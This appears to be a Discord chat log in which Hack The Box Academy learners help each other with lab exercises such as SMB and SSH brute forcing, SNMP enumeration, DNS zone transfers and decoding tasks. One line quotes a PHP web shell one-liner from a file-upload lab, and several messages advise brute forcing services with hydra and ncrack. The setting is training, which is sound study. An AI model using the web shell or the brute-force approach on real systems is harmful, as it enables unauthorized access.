if ssh doesn't suppor password based auth there's no point in trying to connect using username/password, there's likely gonna be a flag or ssh key on the smb

anyway if that doesn't help or if you were to solve this on your own, it's a good idea to do deeper - ie looking at the traffic and figuring out what the issue is. That works everytime 60 % of the time 😄

anonymous auth is indeed one of the big reasons behind false positive cme results.

worth checking with intentionally bogus creds for anon access

people forget about it cause they confuse it with guest and null share access, but its own thing

hmm? so the anon auth works? (should be working in this specific academy module?)

yeah, that's what i mean, null auth and guest access

theres a couple of modules/segments that have anon auth

which module and section is this again?

ah yeah, I have zero notes for some reason on that one

F

Did you brute force smb?

Show me the command you used

Hmm so you are getting false positives?

Give me an example of a false positive

Have you tried resetting the ip

Have you tried using msfconsole smb login scanner

hey, I read in the practice section of cpts that at the end of each module, there will be number of suggested retired machines, I tried to find them but I could not, can anyone help?

Try to slowdown the threads and speed that crackmapexec or msfconsole are scanning at

Hi, hello

Whats the very first false positive you receive when running the scan

How about trying that with smbclient to enumshares 😄

Or crackmapexec

Any rust programmer around?

Show me the command you used for that

Smbclient -U admin ////ip//share

Use crackmapexec to enum shares

You have the right credentials, admin:123456

What is the sharedrive you found

Okay and what happens when you use the command I posted for smbclient

It shouldnt ask for root pass

Are you putting -U admin

👍

And you put: 123456

As the password

Hmm, Im unsure.

Smbclient -U admin ////ip//SHAREDRIVE

Im unsure of how to help then, because that worked for me

Goodluck 👍

You are on Password Attacks - Medium Skills Assessment?

I’m unsure what to tell you I hope you can figure it out 👍

Np nice 👍

Question about Password Attacks easy lab - is the goal to just try to remote crack root's pass to ssh using crackmapexec/hydra and some wordlist (rockyou or the mutated one from resources)? Because there isn't much more in the task, but seems kinda... boring? dumb? I would think I am missing something normally, but with this module I am not sure anymore :/

What have you achieved so far in the lab?

Is anyone stuck on the footprinting hard lab? Trying to bruteforce the snmp community (worthless with the seclists for snmp community lists) and rockyou..either kills the machine or false positives…what’s is usually the strategy you guys follow on selecting a wordlist for these guys and why the hell the lab is again focused on getting one specific list -.-‘ not really sure how this helps getting the concepts

I mean not much. Just scanned the host and I am wondering what to do next. I just want to avoid going down a rabbit hole, which this module had plenty for me :/

Just started this lab

Perhaps spend more time, do what you learned throughout the module. You have no credentials and have two services running.

Now that you know there are two services and you have no access to them, whats the next step?

You mean two services?

I am in the section "Public Exploits" in Getting Started but I can not be connected to the server, I am with the VPN btw.

Yes my bad typo

And to answer that question - probably some more enumeration. Kinda don't know if that was a part of the module though...

Thanks 🙂

Well what about bruteforcing both services?

Well, that's what my first question was about - should I just bruteforce it?

Hi, is there anyone who can help me? I think that sequel is not working in TIER 1

The community string is in an SNMP list, onesixtyone will find it

Im not sure, should you? Why not try it 😄

Bruteforcing ssh is not a fun thing

Well, my first answer is no, because most of the engagements forbid that 😛 Lemme try that

Also - because it's boooooring 😛

Not in this case, bruteforce both services at the same time. You can use hydra for one and ncrack on the other, and maybe while these are running enum the services 👍

Password Attacks Module don’t forget

Yeah, I know. Hate that one...

hi guys. I could use a hint at Question 2 in Footprinting IMAP / POP3
What is the FQDN that the IMAP and POP3 servers are assigned to?
I ve enumerated with nmap, connected to the POP3 and IMAP servers vie openssl, and even tried to use dig ns inlanefreight... in desparation
neither the ...inlanefreight.htb nor the ...inlanefreight.htb seem to be the FQDN assigned to IMAP and POP3

mabye a kind soul could nudge me in the right direction. 🙃

Why would dev or ns be used for a mail server fqdn; also read the connection closely when you connect to it iirc it tells you

no matter what i do the only thing i get is the dev adress when i connect to the imap and pop3 server. nowhere else an adress is shown

Are you keeping the trailing . in your copy/paste

If so, that's why

Also delete that screenshot, spoilers

thanks for your help. I dont know what my problem was. Now it worked though. I could ve sworn i copy pasted the same thing 3 times already into the answer box.

can anyone tell me why my reverse shell php isn't working on the very first File Upload Attacks module?

I keep getting the failed to "dameonize error" and <?php system($_REQUEST['cmd']); ?> doesn't work either

I'm using tun0 and it doesn't seem to be doing anything...

Yes that is what I’m trying for days 😦

You gave my that great hint to focus on that service (i was as well trying to bruteforce ssh and imap)

What is usually your strategy to pick a wordlist? (The 4 snmp related in seclists have zero matches)

Are there any plans to add more defensive/blue team modules/skill paths/job paths to Academy? I'm loving the current modules but it's very offensive centric and I'm hoping for some defensive stuff in the future

no clue about that. You could possibly try thinking about securing the stuff after you pwn it from the defenders perspective if that makes sense

Another hint: focus on the type of server, you probably got the word and overlooked it

I'm talking more investigation or forensics type of module, but your idea could work too if it was part of the skills assessment at the end I guess

well if you're interested in the forensics (i'm guessing some soc like stuff) there's probably not much such content on htb

HTB has always (and likely always will) be focused on offensive security. If your looking fir some defensive stuff, tryhackme has been releasing defensive rooms pretty consistently lately

Yeah THM's recent expansion into defensive content is what made me think about it

I doubt HTB is gonna go the same route

Yeah I get that, if they ever do add more blue team stuff I think it would mesh really well with Academy's module style

It could, but like I said earlier, HTB has and likely always will be primarily focused on offensive security. You get get tidbits of mitigation and detection at the end of some modules but thats likely the most you'll ever see

how do i get the number of zones a domain has?

no clue what exactly do you mean by that question

Yeaaah which is totally fine, I just love HTB as a platform and would like to see more variety in its content, but there's little reason to deviate from what they're already doing

dig @server ANY domain?

"Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer." the nameserver is ns.inlanefreight.htb

Thank you for your help, will try to look again

Server will be the IP

The module/section tells you exactly what to do

I get:

└──╼ [★]$ nslookup ns.inlanefreight.htb 10.129.203.205
Server:        10.129.203.205
Address:    10.129.203.205#53

Name:    ns.inlanefreight.htb
Address: 127.0.0.1

When I AXFR I get: ```
inlanefreight.htb
origin = inlanefreight.htb
mail addr = root.inlanefreight.htb
serial = 2
refresh = 604800
retry = 86400
expire = 2419200
minimum = 604800

and the subdomains

what's the module?

http://academy.hackthebox.com/module/144/section/1256

Active Subdomain Enumeration

to make it a link add http:// in front so i don't have to copy paste

i cant spawn the machine for a week now, NOSQLI assessment 1 wont work for me, but assessment 2 does...
thats so weird

can't spawn?

404 doesn't mean that the box is not running, i'd say it's exactly the opposite

well thats a point

ah right this module talks more about the nslookup tool i haven't done that yet

but the info should be there... I'm busy atm; so maybe someone else can nudge

if you can AXFR, you're probably golden then

all the info should be in the transfer

hmm

iirc

let me read through it one more time

^

Module Using Web Proxies. Page 8 / Encoding/Decoding. How to solve:

The string found in the attached file has been encoded several times with various encoders. Try to use the decoding tools we discussed to decode it and get the flag.

try to use the decoding tools we discussed to decode it and get the flag.

so you're not gonna believe me but; you have to use the tools used in the module to decode it

it kinda tells you what to do

Yeah, I understand 😂, but there is a couple of encodings and I even cannot guess the order of them

if you're still having trouble, i'd try something like dig @10.129.203.205 ANY inlanefreight.htb no clue about the nslookup syntax

It's similar but nslookup gives slightly more info

It's not letting you paste as it's detecting it as spam

this stupid MEE6 bot tells me that I can't send the same message over and over again even though its not the same

😄

ill send you guys the response per DM

Yeah that happens when copying code blocks

possibly just paste the important part only?

i did

it's a mee6 being dumb thing

not uncommon

👀

Has anybody had any issues with breaking into slack by extracting the cookie? (WIndows Priv Esc -- Pillaging)

It starts with base64 then hint says to use url-encoding. What can I do after that? It seems that I've tried everything...
The encoded string:

VTJ4U1VrNUZjRlZXVkVKTFZrWkdOVk5zVW10aFZYQlZWRmh3UzFaR2NITlRiRkphWld0d1ZWUllaRXRXUm10M1UyeFNUbVZGY0ZWWGJYaExWa1V3ZVZOc1VsZGlWWEJWVjIxNFMxWkZNVFJUYkZKaFlrVndWVmR0YUV0V1JUQjNVMnhTYTJGM1BUMD0=

looks like it is a base64

so

¯_(ツ)_/¯

Yeah

no clue about that, have you narrowed it down to sth?

hint says to use url-encoding probably to get the end result

I've decoded that. Output is something unreadable

not as a jumping off point

Yeah. I swear I am following the modules instructions.

i could try to help but haven't done it

sec throwing it into decode to see if there's something else

This is raw out from base64 Decoding:

U2xSUk5FcFVWVEJLVkZGNVNsUmthVXBVVFhwS1ZGcHNTbFJaZWtwVVRYZEtWRmt3U2xSTmVFcFVXbXhLVkUweVNsUldiVXBVV214S1ZFMTRTbFJhYkVwVVdtaEtWRTB3U2uS'…5V³Tf4eeudT¤Åfµ¤tådç5V×F…e„%edf‡u3 ¤v4„åF$d¦ ¥wGuee%•¤WEu&×C5S'…5FÕdf4ee†%†„ÅfµWvUdç5VÆF•e„%ec# E3 ¤dÕE%F$d¦…–µguefGF WEu%D#5S'…6 $c5 C Ò ØL‘ŒÔ  D0=

What Encoding probably is it?

Wait. Instructions say to use a different site

gimme a sec

@high sentinel Figured it out haha

Thanks for trying to help

you have it all wrong ...

@royal glade

1. put the contents into the file
2. base64 decode it
3. think what encoding could be used next
4. hint - ||only 2 types of encodings are used to get the flag||

cuddle time 👀

Lol

#general is for flirting remember?

hey lager quick related question

yeah, sure 😄

Content is given to me as a zip file. It is base64 encoded string in there after unpacking. And after base64 Decoding I've got this

U2xSUk5FcFVWVEJLVkZGNVNsUmthVXBVVFhwS1ZGcHNTbFJaZWtwVVRYZEtWRmt3U2xSTmVFcFVXbXhLVkUweVNsUldiVXBVV214S1ZFMTRTbFJhYkVwVVdtaEtWRTB3U2uS'…5V³Tf4eeudT¤Åfµ¤tådç5V×F…e„%edf‡u3 ¤v4„åF$d¦ ¥wGuee%•¤WEu&×C5S'…5FÕdf4ee†%†„ÅfµWvUdç5VÆF•e„%ec# E3 ¤dÕE%F$d¦…–µguefGF WEu%D#5S'…6 $c5 C Ò ØL‘ŒÔ  D0=

And I do not know what is this

does == denote base 16?

I get a different result after doing my decoding

not that i'm aware of, like base16 encoding or what do you mean specifically? base16 => hex?

sorry i meant at the end of the string and meant 32 not 16

Are u using burp decoder?

that's not correct i've said that already. Just use cyberchef for that

cause i'm curious and doing this while standing

no

using the built in base64 -d command

the answer would probably be the same

ag

i see

i've gotten the flag on cli without issues

That task is to practice using burp decoder XD

lol

that's why i was sanity checking using a different decoder

two things - is the burp decoder setting as UTF-8 and b64?

i'd say burp decoder sucks, i never personally use it for anything

but just my opinion

sanity checking launching burp on mine

I'll check it because it's newly installed

figure sanity checking lets me at least gets me a headstart in the future :D

yeah copying the string you had previously in my burpsuite gives me the same thing I decoded previously, not the junk characters

are you throwing a hash in there? that may output the junk

What exactly should I change in burp settings because I don't see in the settings something like encoding, etc?

under decoder tab I just used decode as:

Yeap

To base64

are you using a file or the raw text

And burp gives me smth weird, not the same string that throws for example cyberchef

Raw text

Just like this

dm me it

and if there are any options you may have changed

Sorry?

cause it looks like the results you got are generally if you use one of the hash options

Nope

I didn't even touch hashes

hmm

Just decode as base64

weird

where do i get this word list for gobuster /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt ?

...

SecList

github

but from aot it amass and i dont find the right subdomain

apt*

use the bigger list then?

20k list?

tried all of them

evem from other worlists

what is the module that you are doing?

n

starting point

three

link?

the walktrough ask me to use this path /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt but this path does not exsit in my vm

blob:https://app.hackthebox.com/27195142-7c04-4828-bfda-b86e47d67d65

page 4

did you install seclists on your machine?

yes

then change the path to whatever the seclist path is on your system

it shown as amass

what command are you using?

~/SecLists/Discovery/DNS/ if it's just downloaded to your home directory

gobuster Vhost

exactly? 😄

Marcielee u was right

but whats the diffrent between each worldlist

if i attack for real so i have to check every single world lists ?

each wordlist has different words and different permutations of words

if you ls -la in that wordlist directory - you will see different filesizes

the top is just the most common ones

and contains however many words it says in it

depending on the wordlist you use it can take a while to finish

i still failed to find the subdomain

some wordlists contain the same words as another;

s3.thetoppers.htb Status: 404

it found it but in 404 code why ?

i see nothing wrong

it means page not found; not necessarily that it doesn't exist

ohhh

so other word list showed me alot of 404

ok i need to learn more

Sometimes a 404 code just means it can't be automated

to be found

you'll learn a lot that sometimes you have to manually check the answers given by automated tools

Hey everyone, I'm on module 2 Web Enumertion and I am stuck. It says to use the Enumeration techniques shown to get the login credentials but I don't see any section to "Login". Is anybody available to give me a quick hand?

curl -v ip?

thank marcielee

not sure what that means

just type in that command

and tell me what output you get

So, I restart the burp and it works now

It says could not resolve host: ip

@cobalt trench replace "ip" with the IP of the target system

and possibly add a port to that

But I still do not understand how to solve it

recursive

It gives me the websites source code

I get after base64 Decoding another base64 string and what is next?

dude

if you get another b64...

Yeah

what is the next logical step

no login credentials or flag that i can notice

yeah, the point is that there's something that likely is tied to the login functionality

One more time I know

something like <form>?

But after that I get not a base64 string

yep

I don't know what Encoding is it

And it seems it is nothing from burp encodings

reminder: what's the original question

<form id=setup method=post action=#>

i went to the host server/wordpress and checked the source code and found it there

curl -v didnt show <form>

Oh, I figured it out

@fathom pendant thanks for your tips

Recursion:
see the definition of recursion

also delete this as it can be seen as a spoiler

looks like you're logging in on / then, there should be some <input> tags in the form which you use to submit the username/password

afk

I went to the target IP /robots.txt and found the directory

Thank you for the help.

np 🙂

Hi, I'm trying to find people to setup a discord call to work on some HTB machines/challenges, Id say I'm ~intermediate but all are welcome. Feel free to PM me if you're interested. Thanks!

Has anyone updated to windows 11? anyone recommend?

I'm running windows 11 atm @hazy grotto, I haven't had any issues with Vbox/HTB.

I like windows 11 so far